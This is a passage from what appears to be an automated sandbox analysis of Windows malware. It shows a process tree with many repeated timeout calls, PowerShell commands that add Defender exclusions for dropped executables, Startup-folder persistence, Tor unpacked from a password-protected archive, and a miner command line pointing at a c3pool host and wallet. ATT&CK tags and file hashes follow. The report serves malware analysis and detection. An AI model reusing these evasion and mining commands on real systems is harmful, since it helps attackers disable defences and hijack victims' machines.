        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3384
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2476
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4188
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4448
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4712
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4988
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5048
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4068
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4292
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4652
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4664
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3732
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3564
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4400
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4624
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4124
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4212
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4312
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4544
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4756
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4800
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4828
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4968
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5080
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4068
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4272
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4740
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4760
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4220
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4732
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2096
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4248
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3732
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4304
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4464
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4592
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4668
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4588
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4856
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5016
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5064
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5092
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3900
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:5112
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1156
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4100
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3460
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1648
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4564
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4596
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3564
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4580
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2816
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4588
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4856
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4928
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4652
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5068
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5092
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3900
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4280
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4248
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4556
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4436
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4216
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4580
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2816
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4844
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4916
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5108
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3900
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3200
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- - C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe
    "C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1680
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTCPIP6Driver.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\System32\SetupTCPIP6Driver.exe
    "C:\Windows\System32\SetupTCPIP6Driver.exe"
    3⤵
    - Executes dropped EXE
    PID:944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTcpipDriver.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\System32\SetupTcpipDriver.exe
    "C:\Windows\System32\SetupTcpipDriver.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of WriteProcessMemory
    PID:2316
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Runs regedit.exe
      PID:2212
- C:\Users\Admin\AppData\Local\Temp\dcrat\php\php.exe
  php -S 127.0.0.1:8000 -t ..\server
  2⤵
  PID:2160

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2252

C:\Windows\system32\taskeng.exe
taskeng.exe {D713CCDD-83E0-4380-9B4C-869B2852EFC1} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:436
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2276
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2728
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:320
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1000
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:664
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2816
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4260
  - - C:\Windows\System32\attrib.exe
      -a rx/0 -o stratum+ssl://auto.c3pool.org:33333 -u 88stqbdHnfya436DJkUvtGfW8tiWNMv6aQFB5cpK7zY2P9G6D5CaM9VfzZmNfaZweXeuhnGZjcqrPJrTXEmvFxttLezJvkm.6B6CDD0E -p x -t 4
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Views/modifies file attributes
      PID:4964
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4608
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4412
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4684
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4276

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
522196f3f44f11f3d29302b7a59055f8

SHA1
b3c5e4aa089290ca2734c8e05eeaafe4ce7791c9

SHA256
6e45f43ccebb6f861dee36587f27ef767269ef61f81b5d82d7f887c3795867d8

SHA512
ab3db0d815b685c6cf52cc7ab4c71befbe87b4fdc4012a0d9b4355dca6094f819a10079d5ca285e507b47143597432721a74202496e0e4558aee1af0bd11c3d1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
43fd89efc29dc1cff219ec7a8226906e

SHA1
690a5068aacf2893983325e45cc64b983ec3558b

SHA256
c5f2e522626395f335cd12c4337293fbbcf144bf36976f2259df03d4dba2a1d1

SHA512
649a235988e2a6a5280919204e777a47b3d1c9eb5bb583f2e0055227408d1ba8999d4270c54301860d3a16042aba68c7812d98091a0009e9f9b070ff7b2326a7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c2e55404019eb9b88147e26ee5827537

SHA1
4c3c95fc1e301586b6c3544e0bb24c8b2be701c5

SHA256
250b9df6ab407963b8768e2f5689c050429f02536ee44ba6f2189d605d4559ff

SHA512
